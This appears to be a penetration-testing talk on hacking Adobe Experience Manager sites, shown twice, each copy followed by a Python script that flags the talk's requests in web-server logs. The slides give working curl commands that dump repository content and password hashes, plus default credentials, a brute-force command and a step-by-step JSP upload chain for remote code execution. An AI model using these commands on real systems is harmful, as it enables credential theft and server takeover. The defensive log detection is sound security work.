Hack1ng Adobe Experience Manager sites
Who is that guy?
• Mikhail Egorov
• Security researcher
• Works in Odin (Parallels)
• 0ang3el (at) gma1l (d0t) com
Related Work
• http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/
• http://www.slideshare.net/CQCON/prsentation-ben-zahler
• https://docs.adobe.com/docs/en/aem/6-0/administer/security/security-checklist.html
What do we want
• Sensitive information from JCR
• Installed OSGI bundles
• Custom scripts
• Usernames
• Password hashes
• Elements that allow anonymous modification
Sensitive information from JCR
• Use JsonRendererServlet
curl -X "GET" http://127.0.0.1:8080/.json
curl -X "GET" http://127.0.0.1:8080/.6.json
curl -X "GET" http://127.0.0.1:8080/.tidy.6.json
curl -X "GET" http://127.0.0.1:8080/.tidy.infinity.json
Installed OSGI bundles
• List of all bundles
• QueryBuilder is your friend!
http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html
curl -X "GET" http://127.0.0.1:8080/bin.tidy.infinity.json
curl -X "GET" http://127.0.0.1:8080/bin/querybuilder.json
Custom scripts
• List custom scripts
• List compiled custom scripts from the cache
curl -X "GET" http://127.0.0.1:8080/apps.tidy.infinity.json
curl -X "GET" http://127.0.0.1:8080/var/classes.tidy.infinity.json
Usernames
• Dump content node properties
• Use a regular expression to extract usernames (pipe with the previous command)
curl -X "GET" http://127.0.0.1:8080/content.infinity.json
python -c 'import sys,re; print("\n".join([m.group(1) for m in re.finditer("\".+?By\":\"(.+?)\"",sys.stdin.readlines()[0])]))' | sort -u
Password hashes
• Use the QueryBuilder bundle
curl -X "GET" "http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=selective&p.properties=rep:principalName%20rep:password&p.limit=100"
Anonymous modification
• Dump content node properties
• Use a regular expression to check (pipe with the previous command)
curl -X "GET" http://127.0.0.1:8080/content.infinity.json
python -c 'import sys,re; m = re.search("\".+?By\":\"anonymous\"",sys.stdin.readlines()[0]); print("Anon modification: " + ("Yes" if m else "No"))'
Getting access
• Try default user credentials: admin/admin, author/author, anonymous/anonymous
• Offline attack (brute-force the hashes)
• Online attack (POST servlet bundle)
patator http_fuzz url=http://127.0.0.1:8080/content/fake.json method=POST user_pass=FILE0:FILE1 0=users.txt 1=pass.txt auth_type=basic -x ignore:code!=200 --threads 5
You have access, now what?
• XSS
• CSRF
• DoS
• Read local files
• RCE
Not covered, sorry!
Webdav bundle, XXE
• CVE-2015-1833 ( http://seclists.org/oss-sec/2015/q2/518 )
• The Webdav OSGI bundle uses an XML parser that is not properly initialized
• Exploit - https://www.exploit-db.com/exploits/37110/
Webdav bundle, XXE
• Out-of-band exploitation
http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
• Pros: works with anonymous credentials
• Cons: you need an external server; unstable
• Inbound exploitation
• Pros: you do not need an external server; more stable
• Cons: you need the credentials of a user that is able to modify some node in the JCR
Webdav bundle, XXE Demo
http://www.youtube.com/watch?v=Hg3AXoG89Gs
Remote code execution
• We have a node: http://127.0.0.1:8080/rce
• We have a script exec.jsp that is magically loaded into the node http://127.0.0.1:8080/apps/rcetype
• When someone navigates to http://127.0.0.1:8080/rce.exec our exec.jsp will be executed.
{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}}
{"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}
Remote code execution
• Step I: Create the rcetype node
curl -u admin:admin -Fjcr:primaryType=nt:folder http://127.0.0.1:8080/content/rcetype
Remote code execution
• Step II: Upload the script exec.jsp to the rcetype node
curl -u admin:admin -Fexec.jsp=@RCE.jsp http://127.0.0.1:8080/content/rcetype
Remote code execution
• Step III: Copy rcetype to /apps
curl -u admin:admin -F:operation=copy -F:dest=/apps/rcetype http://127.0.0.1:8080/content/rcetype
Remote code execution
• Step IV: Create the rce node bound to rcetype
curl -u admin:admin -Fsling:resourceType=rcetype http://127.0.0.1:8080/content/rce
Remote code execution
• Step V: Launch the JSP script
curl -X "GET" http://127.0.0.1:8080/content/rce.exec
Remote code execution, Demo
http://www.youtube.com/watch?v=Z9n2T07e6Ls
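The request patterns shown in the recon slides (deep .json dumps, QueryBuilder requests for rep:password) and in the POST-servlet steps (writes under /content and /apps) are visible in ordinary web-server access logs. The Python script below is an added example, not code from the talk; it assumes Apache combined log format and runs over constructed sample lines.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines in Apache combined log format (not real traffic):
# one benign page view, the recon requests from the slides, a Sling POST
# servlet write, a plain .json request without a depth selector, and an
# /apps listing.
SAMPLE_LOG = """\
10.0.0.5 - - [03/May/2015:21:20:01 +0300] "GET /content/site/en.html HTTP/1.1" 200 5120
10.0.0.9 - - [03/May/2015:21:21:12 +0300] "GET /.tidy.infinity.json HTTP/1.1" 200 98211
10.0.0.9 - - [03/May/2015:21:21:40 +0300] "GET /bin/querybuilder.json?type=rep:User&p.hits=selective&p.properties=rep:principalName%20rep:password&p.limit=100 HTTP/1.1" 200 4410
10.0.0.9 - - [03/May/2015:21:22:05 +0300] "POST /content/rcetype HTTP/1.1" 201 310
10.0.0.5 - - [03/May/2015:21:22:30 +0300] "GET /content/site/en.json HTTP/1.1" 200 220
10.0.0.9 - - [03/May/2015:21:23:02 +0300] "GET /apps.tidy.infinity.json HTTP/1.1" 200 40120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Sling depth selectors understood by JsonRendererServlet: .N.json or .infinity.json
DEPTH_SELECTOR = re.compile(r"^(?:\d+|infinity)$")


def parse_line(line):
    """Return ip, method, decoded path, raw query string and status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {
        "ip": m.group("ip"),
        "method": m.group("method"),
        "path": unquote(path),
        "query": query,
        "status": int(m.group("status")),
    }


def sling_parts(path):
    """Approximate Sling's split of the last path segment into (selectors, extension):
    '/.tidy.infinity.json' -> (['tidy', 'infinity'], 'json')."""
    pieces = path.rsplit("/", 1)[-1].split(".")
    if len(pieces) < 2:
        return [], None
    return pieces[1:-1], pieces[-1]


def classify(req):
    """Return the names of the talk's request patterns that this request matches."""
    findings = []
    selectors, ext = sling_parts(req["path"])
    # Rule 1: JsonRendererServlet dump with a depth selector (.6.json, .infinity.json,
    # with or without .tidy); this is how bundles, scripts and usernames get listed.
    if ext == "json" and any(DEPTH_SELECTOR.match(s) for s in selectors):
        findings.append("jcr-dump")
    # Rule 2: QueryBuilder servlet; asking for rep:password is the hash dump.
    if req["path"] == "/bin/querybuilder.json":
        findings.append("querybuilder")
        props = " ".join(parse_qs(req["query"]).get("p.properties", []))
        if "rep:password" in props:
            findings.append("password-hash-query")
    # Rule 3: Sling POST servlet write under /content or /apps (node creation,
    # file upload, :operation=copy). The form body is not in the access log,
    # so the method and path are the only signal available here.
    if req["method"] == "POST" and req["path"].startswith(("/content/", "/apps/")):
        findings.append("sling-post-write")
    return findings


def scan(log_text):
    """Return (ip, method, path, status, findings) for every flagged line.
    A 2xx status means the instance served or accepted the request; a 403
    from a dispatcher filter is the expected healthy outcome."""
    hits = []
    for line in log_text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        findings = classify(req)
        if findings:
            hits.append((req["ip"], req["method"], req["path"], req["status"], findings))
    return hits


if __name__ == "__main__":
    for ip, method, path, status, findings in scan(SAMPLE_LOG):
        print(f"{ip} {method} {path} -> {status} {', '.join(findings)}")
```

Group the hits by source address: one client issuing jcr-dump, querybuilder and sling-post-write requests within minutes is the sequence the slides walk through, whereas a single .1.json request from an application front end is routine.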
Ask a Ninja

Mikhail Egorov's talk at PHDays

Slide 2. Who is that guy?
  • Mikhail Egorov
  • Security researcher
  • Works in Odin (Parallels)
  • 0ang3el (at) gma1l (d0t) com

Slide 3. Related Work
  • http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/
  • http://www.slideshare.net/CQCON/prsentation-ben-zahler
  • https://docs.adobe.com/docs/en/aem/6-0/administer/security/security-checklist.html

Slide 4. What do we want
  • Sensitive information from JCR
  • Installed OSGI bundles
  • Custom scripts
  • Usernames
  • Password hashes
  • Elements that allow anonymous modification

Slide 5. Sensitive information from JCR
  • Use JsonRendererServlet

    curl -X "GET" http://127.0.0.1:8080/.json
    curl -X "GET" http://127.0.0.1:8080/.6.json
    curl -X "GET" http://127.0.0.1:8080/.tidy.6.json
    curl -X "GET" http://127.0.0.1:8080/.tidy.infinity.json

Slide 6. Installed OSGI bundles
  • List of all bundles
  • QueryBuilder is your friend!
    http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html

    curl -X "GET" http://127.0.0.1:8080/bin.tidy.infinity.json
    curl -X "GET" http://127.0.0.1:8080/bin/querybuilder.json

Slide 7. Custom scripts
  • List custom scripts
  • List compiled custom scripts from the cache

    curl -X "GET" http://127.0.0.1:8080/apps.tidy.infinity.json
    curl -X "GET" http://127.0.0.1:8080/var/classes.tidy.infinity.json

Slide 8. Usernames
  • Dump content node properties
  • Use a regular expression to extract usernames (pipe with the previous command)

    curl -X "GET" http://127.0.0.1:8080/content.infinity.json |
    python -c 'import sys,re; print("\n".join([m.group(1) for m in re.finditer("\".+?By\":\"(.+?)\"", sys.stdin.read())]))' |
    sort -u

Slide 9. Password hashes
  • Use the QueryBuilder bundle

    curl -X "GET" "http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=selective&p.properties=rep:principalName%20rep:password&p.limit=100"

Slide 10. Anonymous modification
  • Dump content node properties
  • Use a regular expression to check (pipe with the previous command)

    curl -X "GET" http://127.0.0.1:8080/content.infinity.json |
    python -c 'import sys,re; m = re.search("\".+?By\":\"anonymous\"", sys.stdin.read()); print("Anon modification:", "Yes" if m else "No")'

Slide 11. Getting access
  • Try default user credentials: admin/admin, author/author, anonymous/anonymous
  • Offline attack (brute-force the hashes)
  • Online attack (POST servlet bundle)

    patator http_fuzz url=http://127.0.0.1:8080/content/fake.json method=POST user_pass=FILE0:FILE1 0=users.txt 1=pass.txt auth_type=basic -x ignore:code!=200 --threads 5

Slide 12. You have access, now what?
  • XSS
  • CSRF
  • DoS
  • Read local files
  • RCE
  Not covered, sorry!

Slide 13. Webdav bundle, XXE
  • CVE-2015-1833 (http://seclists.org/oss-sec/2015/q2/518)
  • The Webdav OSGI bundle uses an XML parser that is not properly initialized
  • Exploit - https://www.exploit-db.com/exploits/37110/

Slide 14. Webdav bundle, XXE
  • Out-of-band exploitation: http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
    • Pros: works with anonymous credentials
    • Cons: you need an external server; unstable
  • Inbound exploitation
    • Pros: you do not need an external server; more stable
    • Cons: you need the credentials of a user that is able to modify some node in the JCR

Slide 16. Remote code execution
  • We have a node: http://127.0.0.1:8080/rce
  • We have a script exec.jsp that is magically loaded into the node http://127.0.0.1:8080/apps/rcetype
  • When someone navigates to http://127.0.0.1:8080/rce.exec, our exec.jsp will be executed.

    {"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}}
    {"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}

Slide 17. Remote code execution
  • Step I: Create the rcetype node

    curl -u admin:admin -F jcr:primaryType=nt:folder http://127.0.0.1:8080/content/rcetype

Slide 18. Remote code execution
  • Step II: Upload the script exec.jsp to the rcetype node

    curl -u admin:admin -F exec.jsp=@RCE.jsp http://127.0.0.1:8080/content/rcetype

Slide 19. Remote code execution
  • Step III: Copy rcetype to /apps

    curl -u admin:admin -F :operation=copy -F :dest=/apps/rcetype http://127.0.0.1:8080/content/rcetype

Slide 20. Remote code execution
  • Step IV: Create the rce node bound to rcetype

    curl -u admin:admin -F sling:resourceType=rcetype http://127.0.0.1:8080/content/rce

Slide 21. Remote code execution
  • Step V: Launch the JSP script

    curl -X "GET" http://127.0.0.1:8080/content/rce.exec
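As an added example (not part of the talk), the request patterns it relies on, the deep JSON dumps and QueryBuilder user queries of slides 5 to 10, the basic-auth guessing of slide 11 and writes under /apps from slides 17 to 20, can be recognised in an ordinary HTTP access log. The log lines below are constructed and the thresholds are assumptions; note that the `:operation=copy`/`:dest` fields of slide 19 travel in the POST body, which a standard access log does not record, so that step needs the Sling request log or the AEM audit log instead.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines in Combined Log Format (not from the talk).
SAMPLE_LOG = """\
10.0.0.5 - - [03/May/2015:21:20:01 +0300] "GET /.tidy.infinity.json HTTP/1.1" 200 51234
10.0.0.5 - - [03/May/2015:21:20:09 +0300] "GET /bin/querybuilder.json?type=rep%3AUser&p.properties=rep:principalName%20rep:password HTTP/1.1" 200 2210
10.0.0.5 - - [03/May/2015:21:21:00 +0300] "POST /content/fake.json HTTP/1.1" 401 0
10.0.0.5 - - [03/May/2015:21:21:01 +0300] "POST /content/fake.json HTTP/1.1" 401 0
10.0.0.5 - - [03/May/2015:21:21:02 +0300] "POST /content/fake.json HTTP/1.1" 401 0
10.0.0.5 - admin [03/May/2015:21:24:38 +0300] "POST /apps/rcetype HTTP/1.1" 201 431
192.0.2.8 - - [03/May/2015:21:25:10 +0300] "GET /content/site/en.1.json HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
DEPTH_RE = re.compile(r'\.(?:tidy\.)?(infinity|\d+)\.json$')
MAX_DEPTH = 2         # JSON selectors deeper than this are flagged (assumed policy)
BRUTE_THRESHOLD = 3   # 401s per (source, path) before flagging (assumed)

def parse(line):
    """Split one access-log line into the fields the rules need (None if unparsable)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    path, _, query = target.partition("?")
    return {"ip": ip, "method": method, "path": path, "query": unquote(query), "status": int(status)}

def json_depth(path):
    """Depth selector of a Sling JSON request (None if not one); 'infinity' counts as unbounded."""
    m = DEPTH_RE.search(path)
    return None if not m else (float("inf") if m.group(1) == "infinity" else int(m.group(1)))

def detect(log_text):
    """Return (rule, source_ip, path) findings for the request patterns the talk relies on."""
    findings, failures = [], Counter()
    for line in log_text.splitlines():
        if (r := parse(line)) is None:
            continue
        if (depth := json_depth(r["path"])) is not None and depth > MAX_DEPTH:
            findings.append(("deep-json-dump", r["ip"], r["path"]))
        if r["path"].endswith("/querybuilder.json") and re.search(r"rep:(User|password)", r["query"]):
            findings.append(("querybuilder-user-enum", r["ip"], r["path"]))
        if r["method"] == "POST" and r["path"].startswith("/apps/"):
            findings.append(("apps-write", r["ip"], r["path"]))  # direct write under /apps
        if r["status"] == 401:
            failures[(r["ip"], r["path"])] += 1
    findings += [("auth-bruteforce", ip, p) for (ip, p), n in failures.items() if n >= BRUTE_THRESHOLD]
    return findings
```

On a real instance the same rules belong in the dispatcher log pipeline, with `.infinity.json` and `/bin/querybuilder.json` additionally blocked for anonymous requests at the dispatcher, as Adobe's security checklist linked on slide 3 recommends.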